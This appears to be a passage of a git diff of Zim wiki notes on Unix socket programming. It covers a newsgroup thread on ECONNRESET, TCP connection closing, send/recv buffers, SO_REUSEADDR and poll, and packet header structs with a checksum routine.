lengthy fsck's), so the ECONNRESET is a possibility.
|
||||
|
||||
--
|
||||
Barry Margolin, barmar@alum.mit.edu
|
||||
Arlington, MA
|
||||
*** PLEASE post questions in newsgroups, not directly to me ***
|
||||
*** PLEASE don't copy me on replies, I'll read them in the group ***
|
||||
|
||||
|
||||
10-04-2007 12:09 AM #8
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
Barry Margolin wrote:
|
||||
> Only if the reboot takes longer than the retransmission limit. In
|
||||
> the days when a reboot took several minutes that would be likely,
|
||||
> but these days many systems can reboot in under a minute (unless
|
||||
> they have to do lengthy fsck's), so the ECONNRESET is a possibility.
|
||||
|
||||
But what of the RFC suggested (or is it mandated?) quiet time on stack
|
||||
start?-)
|
||||
|
||||
rick jones
|
||||
--
|
||||
a wide gulf separates "what if" from "if only"
|
||||
these opinions are mine, all mine; HP might not want them anyway...
|
||||
feel free to post, OR email to rick.jones2 in hp.com but NOT BOTH...
|
||||
|
||||
|
||||
10-04-2007 12:09 AM #9
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
In article ,
|
||||
Rick Jones wrote:
|
||||
|
||||
> Barry Margolin wrote:
|
||||
> > Only if the reboot takes longer than the retransmission limit. In
|
||||
> > the days when a reboot took several minutes that would be likely,
|
||||
> > but these days many systems can reboot in under a minute (unless
|
||||
> > they have to do lengthy fsck's), so the ECONNRESET is a possibility.
|
||||
>
|
||||
> But what of the RFC suggested (or is it mandated?) quiet time on stack
|
||||
> start?-)
|
||||
|
||||
If I understand it correctly, this just prohibits the rebooted system
|
||||
from initiating connections during the quiet time. It doesn't affect
|
||||
responding to segments received. In fact, the point of the quiet time
|
||||
is to ensure that new connections don't inadvertently reuse the port and
|
||||
sequence numbers of connections from before the reboot, which would
|
||||
prevent responding to those packets with RST.
|
||||
|
||||
--
|
||||
Barry Margolin, barmar@alum.mit.edu
|
||||
Arlington, MA
|
||||
*** PLEASE post questions in newsgroups, not directly to me ***
|
||||
*** PLEASE don't copy me on replies, I'll read them in the group ***
|
||||
|
||||
|
||||
10-04-2007 12:10 AM #10
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
|
||||
I have written a multi-threaded C client application running on HP UX
|
||||
11 Pa RISC that sends a SOAP request via send( ) to a webservice
|
||||
residing on a Windows PC. The send( ) is always successful, and I
|
||||
perform no other socket calls until I issue a recv( ) to get the
|
||||
webservice response. Very occasionally the application either gets no
|
||||
response or an ECONNRESET response. We suspect some sort of network
|
||||
issue between the client and server. I have built and deployed my
|
||||
client application for several other platforms including Solaris and
|
||||
Windows and have never experienced this issue.
|
||||
|
||||
I feel that my application should handle this situation more
|
||||
gracefully, and to this end my questions are:
|
||||
|
||||
Is it safe to assume anything regarding the state of the send( )
|
||||
request on the webservice server? More specifically, what would be the
|
||||
proper way for my client application to recover?
|
||||
|
||||
On Aug 9, 3:27 pm, Rick Jones wrote:
|
||||
> chsal...@gmail.com wrote:
|
||||
> > The man page for recv and read list the error ECONNRESET as an error
|
||||
> > condition that happens when "A connection was forcibly closed by a
|
||||
> > peer." I take this to mean that, assuming a TCP connection, if a
|
||||
> > client is recv'ing from a server, and the server suddenly crashes,
|
||||
> > then on the client side recv will return -1 and set errno to
|
||||
> > ECONNRESET.
|
||||
>
|
||||
> Actually no When the server _system_ suddenly crashes, your
|
||||
> application receives nothing.
|
||||
>
|
||||
> ECONNRESET means the connection has received a ReSeT (RST) segment
|
||||
> (ostesibly) from the remote TCP. There are a multitude of reasons
|
||||
> such a segment could be received, including, but not limited to:
|
||||
>
|
||||
> *) the remote abused SO_LINGER and did an abortive close of the
|
||||
> connection
|
||||
>
|
||||
> *) your application sent data which arrived after the remote called
|
||||
> shutdown(SHUT_RD) or close()
|
||||
>
|
||||
> *) the remote TCP hit a retransmission limit and aborted (yes, if the
|
||||
> data segments weren't getting through the chances of the RST making
|
||||
> it are slim, but still non-zero)
|
||||
>
|
||||
> *) there was some actual TCP protocol error between the two systems
|
||||
>
|
||||
> 99 times out of ten if the server _application_ terminates
|
||||
> (prematurely) the normal close() which happens on almost all platorms
|
||||
> will cause TCP to emit a FINished (FIN) segment. That would then be a
|
||||
> recv/read return of zero at your end. Of course if your application
|
||||
> ignored that and then tried to send something, that brings us to the
|
||||
> second bullet item above.
|
||||
>
|
||||
> > But the man page says that recv should only return 0 if "the peer
|
||||
> > has performed an orderly shutdown". But a SIGSEGV is certainly not
|
||||
> > my idea of an "orderly shutdown"!
|
||||
>
|
||||
> Ah, but as per above, 99 times out of ten, when the OS is cleaning-up
|
||||
> after the SIGSEGV'd application, it goes ahead and calls (the moral
|
||||
> equivalent to) close(), which unless perhaps the application has set
|
||||
> the abortive close SO_LINGER options will result in a FIN being sent.
|
||||
> The TCP code doesn't know the difference between a close() from the
|
||||
> app making a direct call, the system making a close() call on normal
|
||||
> program termination, or one from abnormal termination.
|
||||
>
|
||||
> I suppse you could try setting the SO_LINGER options on the server
|
||||
> code to cause an RST when close() is called and then see what killing
|
||||
> the process does. Just be sure that you only do that in a debug
|
||||
> version and/or have code to put SO_LINGER back the way it should be
|
||||
> when doing a "normal" close() in your server app. Hmm, that might be
|
||||
> one of the few valid (IMO) reasons to use that otherwise heinous
|
||||
> direct-to_RST SO_LINGER option... Perhaps one day I will try that
|
||||
> with netperf.
|
||||
>
|
||||
> rick jones
|
||||
> --
|
||||
> Process shall set you free from the need for rational thought.
|
||||
> these opinions are mine, all mine; HP might not want them anyway...
|
||||
> feel free to post, OR email to rick.jones2 in hp.com but NOT BOTH...
|
||||
|
||||
|
||||
|
||||
10-04-2007 12:10 AM #11
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
Fish Maker wrote:
|
||||
> I have written a multi-threaded C client application running on HP
|
||||
> UX 11 Pa RISC that sends a SOAP request via send( ) to a webservice
|
||||
> residing on a Windows PC. The send( ) is always successful, and I
|
||||
> perform no other socket calls until I issue a recv( ) to get the
|
||||
> webservice response. Very occasionally the application either gets
|
||||
> no reponse or an ECONNRESET response. We suspect some sort of
|
||||
> network issue between the client and server. I have built and
|
||||
> deployed my client application for several other platforms including
|
||||
> Solaris and Windows and have never experienced this issue.
|
||||
|
||||
> I feel that my application should handle this situation more
|
||||
> gracefully, and to this end my questions are:
|
||||
|
||||
> Is it safe to assume anything regarding the state of the send( )
|
||||
> request on the webservice server? More specifically, what would be
|
||||
> the proper way for my client application to recover?
|
||||
|
||||
If you have received nothing but the ECONNRESET on the recv() you can
|
||||
assume nothing about the state of the request on the server. You do
|
||||
not know if the server application received the data, nor if it acted
|
||||
upon the data if it did receive it. To know that you need to receive
|
||||
some sort of message from the server application.
|
||||
|
||||
I'm not fully up on all the terminology, but you may want to web
|
||||
search on "two phase commit."
|
||||
|
||||
rick jones
|
||||
--
|
||||
web2.0 n, the dot.com reunion tour...
|
||||
these opinions are mine, all mine; HP might not want them anyway...
|
||||
feel free to post, OR email to rick.jones2 in hp.com but NOT BOTH...
|
||||
81
Zim/Programme/APUE/socket/TCP连接关闭总结.txt
Normal file
@@ -0,0 +1,81 @@
Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2012-02-27T20:06:34+08:00

====== Summary of TCP Connection Closing ======
Created Monday 27 February 2012

http://blog.csdn.net/shallwake/article/details/5250467

The topic is too broad to cover fully, so this is only a brief summary. For details see "UNIX Network Programming", Volume 1, Sections 5.7, 5.12, 5.14, 5.15 and 6.6, and the SO_LINGER option in Section 7.5.

Take a simple echo server as the example: the client reads characters from standard input and sends them to the server, the server sends them back unchanged, and the client prints what it receives to standard output.

A socket can then be closed in the following situations:

1. The client closes the connection:

1.1 The client calls close()
1.2 The client process exits
1.3 The client calls shutdown()
1.4 The client calls close() with the SO_LINGER option set
1.5 The client crashes (sudden power loss, unplugged cable, or abnormal shutdown, so the kernel sends no FIN, and the host does not reboot)


2. The server closes the connection:

2.1 The server calls close()
2.2 The server process exits
2.3 The server crashes
2.4 The server crashes, with the SO_KEEPALIVE option set

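========================================divider=========================================

1.1 and 1.2 are equivalent: even if the client process simply exits, the kernel closes the socket on its behalf. Note that the connection is really closed only __when the socket's reference count drops to 0__. __By default close() returns immediately; the kernel then tries to send everything still in the send buffer, and only after that sends the FIN.__ So __data a process has sent may not yet have reached the peer when the process exits__.

This brings us to the four-way handshake that closes a TCP connection. It can be seen as two FIN/ACK pairs. The side that closes first (the active close) sends a FIN and, after receiving the ACK, enters FIN_WAIT2. This is also called the __"half-closed" state__. Importantly, at this point __the actively closing side can still receive data but can no longer send it__.
Notes:
1. "Send" here means a send or write system call made after the local TCP has sent its FIN (__triggered by close() or shutdown(SHUT_WR)__). It **does not include data already queued in the sender's kernel TCP buffer** (data handed over by a send that returned successfully before the close).
2. If the application keeps sending after shutdown(SHUT_WR), send and write __may raise SIGPIPE and then fail with errno EPIPE__ (after close() the descriptor itself is no longer valid, and the call fails with EBADF).

The passively closing side has now received the FIN. Its application normally learns of this when __read(socket) returns 0 (the local side can still send data)__. When it then calls close(socket), the second FIN/ACK pair follows and the active side enters TIME_WAIT. That completes the four-way handshake.

That is how a connection is closed in the normal case.
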
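Now 1.3. shutdown() differs from close() mainly in these ways:

* __shutdown() ignores the reference count: for the send direction it starts the FIN sequence right away, even if other descriptors still refer to the socket__ (data already queued in the send buffer is still sent before the FIN);
* shutdown() can close just __one direction__ of the connection: sending, receiving, or both.

__After shutdown(SHUT_WR) the socket is in the half-closed state described above, and the four-way handshake can still complete.__
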
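===== Now 1.4: why set SO_LINGER? =====

SO_LINGER exists to __change the default behavior of close()__. It can determine at which point close() returns, or make the socket __send an RST immediately (with no TIME_WAIT state)__, in which case no FIN is sent, the receiver gets an ECONNRESET error, and the connection is **torn down at once**.

To sum up 1.1 through 1.4: with so many ways to close a connection, which is best?

The choice should be judged against the worst case: the peer host has crashed, or a network fault has stalled packet delivery.

* RST is ruled out: there is no TIME_WAIT state at all, so after a network fault **a newly created socket may receive segments that belonged to the destroyed one**.
* close() cannot guarantee that the peer receives the FIN (close **returns immediately**; the kernel tries to send all data in the TCP buffer and then the FIN, but by then __the sending process may already have exited__).
* close() with SO_LINGER can make close() __return only after the ACK arrives__, but still cannot guarantee that the four-way handshake completes.
* shutdown() first enters the half-closed state; then call read(): a return value of 0 (the peer's FIN has arrived) shows that the handshake is proceeding normally. __This is the best approach.__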
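
The last approach in the list (half-close, then read until 0) might look like this in C. It is a sketch under assumptions: graceful_close is a name made up here, the socket is blocking, and any late data from the peer is simply discarded. Real code would also want a timeout, because the read blocks for as long as the peer sends neither data nor FIN.

```c
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Half-close fd with shutdown(SHUT_WR), wait for the peer's FIN
 * (read returning 0), then release the descriptor.
 * Returns 0 if the peer's FIN was seen, -1 on error. */
int graceful_close(int fd)
{
    char discard[512];
    ssize_t n;
    int rc = 0;

    if (shutdown(fd, SHUT_WR) < 0) {         /* our FIN goes out after queued data */
        rc = -1;
    } else {
        for (;;) {
            n = read(fd, discard, sizeof(discard));
            if (n > 0)
                continue;                    /* late data from the peer: drop it */
            if (n < 0 && errno == EINTR)
                continue;                    /* interrupted by a signal: retry */
            if (n < 0)
                rc = -1;                     /* e.g. ECONNRESET */
            break;                           /* n == 0: peer's FIN arrived */
        }
    }
    close(fd);
    return rc;
}
```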
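
On reflection, most applications do not need to go this far. Take an online game server: if a client calls close() and the server somehow does not notice, treat it as case 1.5; if the server calls close() and the client does not notice, treat it as case 2.3. Either way there is a solution.

Now 1.5. The answer is simple: add link-failure detection on the server, which every large TCP server needs anyway: __periodically send a small packet to check whether the client has gone away abnormally__.
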
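========================================divider=========================================

Closing from the server side:

2.1 and 2.2 are equivalent, and in general they also match 1.1 and 1.2, except that the server is now the active closer.
2.3 The server crashes: the client never receives an ACK and keeps retransmitting; with a standard socket implementation it takes about __9 minutes__ before an error is returned.
2.4 The server crashes while the client has had no traffic with it for a long time: setting the __SO_KEEPALIVE__ option lets the client find out.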
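
Turning on SO_KEEPALIVE for case 2.4 is a single setsockopt call. A minimal sketch follows; the helper names are invented for this note. Only the portable on/off switch is shown: how long the connection must be idle and how often probes are sent are system settings (two hours of idle time is a common default), and some systems offer per-socket controls such as TCP_KEEPIDLE on Linux.

```c
#include <sys/socket.h>

/* Enable TCP keepalive probes on fd. Returns 0 on success, -1 on error. */
int enable_keepalive(int fd)
{
    int on = 1;
    return setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &on, sizeof(on));
}

/* Report whether keepalive is on: 1 = on, 0 = off, -1 = error. */
int keepalive_enabled(int fd)
{
    int value = 0;
    socklen_t len = sizeof(value);

    if (getsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &value, &len) < 0)
        return -1;
    return value != 0;
}
```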
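
========================================divider=========================================

Afterword: networking is a complicated subject, as even closing a TCP connection shows. Ordinary programmers rarely think it through in this much detail, but I believe these problems trouble them all the same.

Addendum: in my tests on Windows, __cases 1.2 and 2.2 behave like close() with SO_LINGER and send an RST directly__, perhaps because the system has to reclaim resources promptly. This **differs from Linux**; try it if you are interested.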
52
Zim/Programme/APUE/socket/理解套接字recv(),send().txt
Normal file
@@ -0,0 +1,52 @@
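Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2012-02-27T20:43:52+08:00

====== Understanding socket recv() and send() ======
Created Monday 27 February 2012

http://blog.csdn.net/shallwake/article/details/5273727

While reading UNP today I found a very good diagram; once it is understood, most of the confusion goes away. Here is a brief summary. Note that the diagram assumes input is read from stdin and passed to send on the socket, and that data received from the socket with recv is written to stdout.

===== send: the kernel send buffer (note that the send and receive buffers are circular) =====
{{./1.jpg}}

* tooptr: points to the next byte __to be handed to the socket__
* toiptr: points to the next position that can __accept data from the application__

So:
* The amount of data waiting to go to the socket is toiptr - tooptr.
* The amount of data the buffer can still accept from stdin is &to[MAXLINE] - toiptr.
* Blocking mode: send returns once the application's data has been copied into the kernel buffer; if the buffer cannot hold __all of the data__ (for example because the network is slow), the call blocks until there is enough room.
* Non-blocking mode: if the buffer is __full__, send returns -1 at once with errno set to EWOULDBLOCK; if there is some room, it returns at once with __the number of bytes actually copied__.

=============================divider===================================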
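
===== recv: the kernel receive buffer =====
{{./2.jpg}}
* froptr: points to the next byte __to be handed to the application__
* friptr: points to the next position that can __accept data from the socket__

So:
* The amount of data __available to the application__ is friptr - froptr.
* The amount of data the buffer can still accept __from the socket__ is &fr[MAXLINE] - friptr.
* Blocking mode: if the buffer holds no data, recv __blocks until data arrives; the amount returned is not fixed__: it may be a single byte or a whole packet.
* Non-blocking mode: if the buffer holds no data, recv returns -1 at once with errno set to EWOULDBLOCK; if data is available, it behaves as in blocking mode.

=============================divider===================================

===== Summary: =====

* Blocking or not, never assume that send(n) or recv(n) transfers exactly n bytes.
* A clear picture of the kernel buffers helps a great deal in understanding network programming.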
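
For blocking sockets, the first point of the summary is usually handled with small loops like the ones below. This is a sketch; send_all and recv_all are names chosen for this note, not library functions. Each loop keeps calling send or recv until the requested count is reached, the peer closes, or an error occurs.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/socket.h>
#include <sys/types.h>

/* Send exactly len bytes on a blocking socket.
 * Returns 0 on success, -1 on error (errno set by send). */
int send_all(int fd, const void *buf, size_t len)
{
    const char *p = buf;

    while (len > 0) {
        ssize_t n = send(fd, p, len, 0);
        if (n < 0) {
            if (errno == EINTR)
                continue;                    /* interrupted: retry */
            return -1;
        }
        p += n;                              /* short send: advance and go on */
        len -= (size_t)n;
    }
    return 0;
}

/* Receive exactly len bytes on a blocking socket.
 * Returns 1 on success, 0 if the peer closed first, -1 on error. */
int recv_all(int fd, void *buf, size_t len)
{
    char *p = buf;

    while (len > 0) {
        ssize_t n = recv(fd, p, len, 0);
        if (n == 0)
            return 0;                        /* FIN before all data arrived */
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        p += n;
        len -= (size_t)n;
    }
    return 1;
}
```

These loops are only appropriate where blocking is acceptable, such as a simple client; the closing section of this page explains why a server that handles many sockets should not spin in a loop like this.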
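
===== Thoughts: =====

A well-known server design rule is "__never use blocking operations__".
The reasons are easy to see: first, to make full use of the CPU; second, safety, since a malicious client can easily make the server block on it.

On the __safety of non-blocking I/O__: I have seen a lot of code that puts a non-blocking send() in a loop that does not exit until all n bytes have been sent. That works in normal conditions, but when the network is slow, the diagram above suggests that the while() loop will be slow to exit too, which is bound to delay the server's sends on other sockets. It is worse still if the peer is malicious, for example one that receives a single byte and then calls sleep().

So I think a high-performance server cannot use blocking calls, nor can it keep any I/O operation in a loop until the expected amount of data has been transferred. I will write this up later.
(poll, epoll, select and the like can be used.)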
BIN
Zim/Programme/APUE/socket/理解套接字recv(),send()/1.jpg
Normal file
|
After Width: | Height: | Size: 12 KiB |
BIN
Zim/Programme/APUE/socket/理解套接字recv(),send()/2.jpg
Normal file
|
After Width: | Height: | Size: 12 KiB |
54
Zim/Programme/APUE/socket2.txt
Normal file
@@ -0,0 +1,54 @@
Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2011-04-21T16:54:40+08:00

====== socket2 ======
Created Thursday 21 April 2011
http://blog168.chinaunix.net/space.php?uid=20196318&do=blog&id=171096
1. Reusing an address that is already in use

Problem: right after shutting down the test program, restarting the server fails in bind with the error EADDRINUSE.

Cause: the end that performs the active close stays in the TIME_WAIT state for a while after closing. Because I ran the client and the server on the same machine, when the server restarted and called bind, the previous connection had possibly not finished closing and still existed, so bind failed. Setting the SO_REUSEADDR socket option before calling bind allows the bound address to be reused; as a rule every TCP server should set this option. It is done like this:

int flag = 1;
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &flag, sizeof(flag));

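2. I/O multiplexing

Calling read/write directly on a socket, and calling select/poll first and then read/write, are both blocking I/O; the former blocks in the read or write system call, the latter blocks in select/poll. Because the select approach needs two system calls, I/O multiplexing is at a slight disadvantage there; its advantage is that we can wait for several descriptors to become ready at once.

The usual programming model for I/O multiplexing is as follows (using poll; for a worked example see UNP, page 158):

1. Create an array of pollfd structures whose length is the maximum number of descriptors the process may open; OPEN_MAX from <limits.h> is a simple choice.
2. Set the first element to the readiness condition for the listening socket, and clear all the other elements.
3. Call poll and wait for it to return.
4. For each descriptor that is ready:
* If it is the listening descriptor, call accept to get a connected descriptor and store its readiness condition in the first free slot of the pollfd array; decrement the count of ready descriptors, and go back to step 3 when it reaches 0.
* If it is a connected descriptor, read the request from it and send the response, remove the descriptor from the pollfd array, and decrement the count of ready descriptors; go back to step 3 when it reaches 0.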
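
The steps above can be sketched in C as one "round" of the loop. This is an illustration under assumptions, not the UNP example: the pollset_* names and the MAX_FDS limit are invented here, the service is a plain echo, and a connection is dropped from the array when the peer closes it rather than after a single request.

```c
#include <poll.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#define MAX_FDS 64   /* assumption: small fixed table instead of OPEN_MAX */

/* Steps 1-2: slot 0 watches the listening socket, all other slots are empty.
 * poll() ignores entries whose fd is negative. */
void pollset_init(struct pollfd *fds, int listen_fd)
{
    int i;

    fds[0].fd = listen_fd;
    fds[0].events = POLLIN;
    fds[0].revents = 0;
    for (i = 1; i < MAX_FDS; i++) {
        fds[i].fd = -1;
        fds[i].events = 0;
        fds[i].revents = 0;
    }
}

/* Store fd in the first free slot. Returns the slot index, or -1 if full. */
int pollset_add(struct pollfd *fds, int fd)
{
    int i;

    for (i = 1; i < MAX_FDS; i++) {
        if (fds[i].fd < 0) {
            fds[i].fd = fd;
            fds[i].events = POLLIN;
            fds[i].revents = 0;
            return i;
        }
    }
    return -1;
}

/* Steps 3-4: one poll() call plus handling of every ready descriptor.
 * Returns the number of descriptors handled, 0 on timeout, -1 on error. */
int pollset_round(struct pollfd *fds, int timeout_ms)
{
    char buf[1024];
    int i, handled = 0;
    int nready = poll(fds, MAX_FDS, timeout_ms);

    if (nready <= 0)
        return nready;
    if (fds[0].revents & POLLIN) {           /* new connection pending */
        int conn = accept(fds[0].fd, NULL, NULL);
        if (conn >= 0 && pollset_add(fds, conn) < 0)
            close(conn);                     /* table full: refuse */
        handled++;
    }
    for (i = 1; i < MAX_FDS && handled < nready; i++) {
        ssize_t n;

        if (fds[i].fd < 0 || !(fds[i].revents & (POLLIN | POLLERR | POLLHUP)))
            continue;
        n = read(fds[i].fd, buf, sizeof(buf));
        if (n > 0) {
            write(fds[i].fd, buf, (size_t)n); /* echo; short writes ignored here */
        } else {
            close(fds[i].fd);                /* EOF or error: free the slot */
            fds[i].fd = -1;
        }
        handled++;
    }
    return handled;
}
```

A server would call pollset_init once with its listening socket and then call pollset_round in a loop, typically with a timeout of -1 to wait indefinitely.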

3. Serving TCP and UDP on the same address

1. Create a TCP socket and bind the address.
2. Create a UDP socket and bind the address.
3. Call select/poll to check whether the TCP or UDP socket is ready.
* If the TCP socket is readable, call accept to get the connected socket, then read and answer the request.
* If the UDP socket is readable, read the request directly and send the response.

See UNP, page 223, for a worked example.
186
Zim/Programme/APUE/socket_各种头数据结构及简要说明.txt
Normal file
@@ -0,0 +1,186 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T13:13:16+08:00
|
||||
|
||||
====== Socket header data structures with brief notes ======
Created Saturday 04 June 2011
http://www.cppblog.com/franksunny/archive/2007/01/11/17537.html

Posted by: 许超  Date: 2006-06-12 18:44:51.153  Original author: supermgr
|
||||
|
||||
//DATATYPE
// Fixed-width types are taken from <stdint.h>: "long" is 64 bits wide on LP64
// systems, so it must not be used for 32-bit protocol fields.
#include <stdint.h>
#include <wchar.h>

typedef int8_t int8;
typedef int16_t int16;
typedef int32_t int32;
typedef int64_t int64;
typedef unsigned int uint;
typedef uint8_t uint8;
typedef uint16_t uint16;
typedef uint32_t uint32;
typedef uint64_t uint64;
typedef float float32;
typedef double float64;
typedef wchar_t wchar;
//typedef void* ptr;
typedef int32 boolen;

// IP header
typedef
struct _x_iphdr
{
    uint8 ver; // 4-bit IP version, 4-bit header length
    uint8 tos; // 8-bit type of service (TOS)
    uint16 len; // 16-bit total length (bytes)
    uint16 ident; // 16-bit datagram identification
    uint16 frag; // 3-bit flags / 13-bit fragment offset
    uint8 ttl; // 8-bit time to live (TTL)
    uint8 proto; // 8-bit protocol (TCP, UDP or other)
    uint16 sum; // 16-bit IP header checksum
    uint32 srcip; // 32-bit source IP address
    uint32 dstip; // 32-bit destination IP address
}x_iphdr;

// TCP pseudo header
typedef
struct _x_tcphdrpsd
{
    uint32 saddr; // source address
    uint32 daddr; // destination address
    uint8 mbz; // unused, must be zero
    uint8 proto; // protocol type
    uint16 tcpl; // TCP length
}x_tcphdrpsd;

// TCP header
typedef
struct _x_tcphdr
{
    uint16 sport; // 16-bit source port
    uint16 dport; // 16-bit destination port
    uint32 seq; // 32-bit sequence number
    uint32 ack; // 32-bit acknowledgment number
    uint8 len; // 4-bit header length / first 4 of the 6 reserved bits
    uint8 flag; // last 2 reserved bits / 6 flag bits (control)
    uint16 win; // 16-bit window size
    uint16 sum; // 16-bit TCP checksum
    uint16 urp; // 16-bit urgent pointer
}x_tcphdr;

// UDP header
typedef
struct _x_udphdr
{
    uint16 sport; // 16-bit source port
    uint16 dport; // 16-bit destination port
    uint16 len; // 16-bit length
    uint16 sum; // 16-bit checksum
}x_udphdr;

// ICMP header
typedef
struct _x_icmphdr
{
    uint8 type; // 8-bit type
    uint8 code; // 8-bit code
    uint16 cksum; // 16-bit checksum
    uint16 ident; // identifier (usually the process ID)
    uint16 seq; // sequence number
    uint32 tamp; // timestamp
}x_icmphdr;

// IGMP header (IGMPv2 layout, 8 bytes; the original note listed code before
// type and an extra 16-bit reserved field, which matches no IGMP version)
typedef
struct _x_igmphdr
{
    uint8 type; // 8-bit type
    uint8 code; // 8-bit max response time (unused in IGMPv1)
    uint16 cksum; // 16-bit checksum
    uint32 addr; // 32-bit group address
}x_igmphdr;
|
||||
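Several of the headers above carry a 16-bit checksum field. The note does not show how it is computed; a minimal sketch of the Internet checksum (the one's-complement sum described in RFC 1071) follows. The function name inet_checksum is an assumption, and the sketch is only meant for buffers of ordinary packet size.

```c
#include <stddef.h>
#include <stdint.h>

/* Internet checksum over len bytes. The data is treated as a sequence of
 * big-endian 16-bit words; an odd trailing byte is padded with zero.
 * The result is in host byte order: store it with htons(), or write the
 * high byte first, when filling a header field. */
uint16_t inet_checksum(const void *data, size_t len)
{
    const uint8_t *p = data;
    uint32_t sum = 0;

    while (len > 1) {
        sum += ((uint32_t)p[0] << 8) | p[1];
        p += 2;
        len -= 2;
    }
    if (len == 1)
        sum += (uint32_t)p[0] << 8;

    /* Fold the carries back into the low 16 bits. */
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);

    return (uint16_t)~sum;
}
```

For the IP header the sum covers the header only, with the sum field set to zero beforehand. For TCP and UDP it covers the pseudo header, the protocol header, and the payload.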
76
Zim/Programme/APUE/socket介绍.txt
Normal file
@@ -0,0 +1,76 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T13:23:53+08:00
|
||||
|
||||
====== Introduction to sockets ======
Created Saturday 04 June 2011
|
||||
http://blog.sina.com.cn/s/blog_6c8f8eba0100rgze.html
|
||||
(2011-04-12 09:53:22)
|
||||
|
||||
Processes that communicate using sockets use a **client server model**. A server provides a service and clients make use of that service. One example would be a Web Server, which provides web pages, and a web client, or browser, which reads those pages. A server using sockets first **creates a socket** and then **binds a name** to it. The format of this name is dependent on the **socket's address family** and it is, in effect, the **local address** of the server. The socket's name or address is specified using the **sockaddr data structure**. An INET socket would have an IP port address bound to it. The registered port numbers can be seen in **/etc/services**; for example, the port number for a web server is 80. Having bound an address to the socket, the server then **listens for incoming connection requests** specifying the bound address. The originator of the request, the client, creates a socket and **makes a connection request** on it, specifying the target address of the server. For an INET socket the address of the server is its IP address and its port number. These incoming requests must find their way up through the various protocol layers and then wait on the **server's listening socket**. Once the server has received the incoming request it either accepts or rejects it. If the incoming request is to be accepted, the server must **create a new socket to accept it on**. Once a socket has been used for listening for incoming connection requests **it cannot be used to support a connection**. With the connection established both ends are free to send and receive data. Finally, when the connection is no longer needed it can be shut down. Care is taken to ensure that data packets in transit are correctly dealt with.
|
||||
|
||||
The exact meaning of operations on a BSD socket depends on its underlying **address family**. Setting up **TCP/IP** connections is very different from setting up an amateur radio **X.25** connection. Like the **virtual filesystem**, Linux abstracts the socket interface with the BSD socket layer being concerned with the BSD socket interface to the application programs which is in turn supported by independent address family specific software.
|
||||
|
||||
At kernel initialization time, the **address families** built into the kernel register themselves with the BSD socket interface.
|
||||
Later on, as applications create and use BSD sockets, an association is made between the BSD socket and its supporting address family.
|
||||
This association is made via cross-linking data structures and tables of address family specific support routines.
|
||||
For example there is an address family specific socket creation routine which the BSD socket interface uses when an application creates a new socket.
|
||||
|
||||
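TCP/IP protocol structure:
{{./TCP&IP协议结构.jpeg}}
Linux network layers:
{{./Linux网络层.gif}}
Python is well suited to interprocess communication and parallel computing, which goes back to its origins: it grew up around Amoeba, one of the earliest distributed operating systems, and the Python socket module is a direct transliteration of the BSD socket layer.

The engineering way of thinking treats the system under study as a whole made up of

"Layers"
"Subsystems"
"Submodules"
and so on.
Linux file structure:
{{../linux-file-struct.gif}}
Data in formats such as XML and JSON can only travel between machines and across networks once a socket has been created and a transfer protocol such as HTTP or FTP (or a gateway interface such as CGI) is followed. Sockets solve communication between processes on different machines.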
|
||||
-
|
||||
python socket
|
||||
http://docs.python.org/release/3.1.3/library/socket.html#module-socket
|
||||
The Python interface is a straightforward transliteration of the Unix system call and library interface for sockets to Python’s object-oriented style: the socket() function returns a socket object whose methods implement the various socket system calls. Parameter types are somewhat higher-level than in the C interface: as with read() and write() operations on Python files, buffer allocation on receive operations is automatic, and buffer length is implicit on send operations.
|
||||
-
|
||||
Python network protocol implementations and support
|
||||
Internet Protocols and Support
|
||||
|
||||
20.1. webbrowser — Convenient Web-browser controller
|
||||
20.2. cgi — Common Gateway Interface support
|
||||
20.3. cgitb — Traceback manager for CGI scripts
|
||||
20.4. wsgiref — WSGI Utilities and Reference Implementation
|
||||
20.5. urllib.request — Extensible library for opening URLs
|
||||
20.6. urllib.response — Response classes used by urllib
|
||||
20.7. urllib.parse — Parse URLs into components
|
||||
20.8. urllib.error — Exception classes raised by urllib.request
|
||||
20.9. urllib.robotparser — Parser for robots.txt
|
||||
20.10. http.client — HTTP protocol client
|
||||
20.11. ftplib — FTP protocol client
|
||||
20.12. poplib — POP3 protocol client
|
||||
20.13. imaplib — IMAP4 protocol client
|
||||
20.14. nntplib — NNTP protocol client
|
||||
20.15. smtplib — SMTP protocol client
|
||||
20.16. smtpd — SMTP Server
|
||||
20.17. telnetlib — Telnet client
|
||||
20.18. uuid — UUID objects according to RFC 4122
|
||||
20.19. socketserver — A framework for network servers
|
||||
20.20. http.server — HTTP servers
|
||||
20.21. http.cookies — HTTP state management
|
||||
20.22. http.cookiejar — Cookie handling for HTTP clients
|
||||
20.23. xmlrpc.client — XML-RPC client access
|
||||
20.24. xmlrpc.server — Basic XML-RPC servers
|
||||
|
||||
Python web development frameworks
|
||||
|
||||
Django
|
||||
webpy
|
||||
Tornado
|
||||
zope
|
||||
|
||||
Developing and using network proxies in Python
|
||||
|
||||
BIN
Zim/Programme/APUE/socket介绍/Linux网络层.gif
Normal file
|
After Width: | Height: | Size: 4.5 KiB |
BIN
Zim/Programme/APUE/socket介绍/TCP&IP协议结构.jpeg
Normal file
|
After Width: | Height: | Size: 25 KiB |
188
Zim/Programme/APUE/socket小结1.txt
Normal file
@@ -0,0 +1,188 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
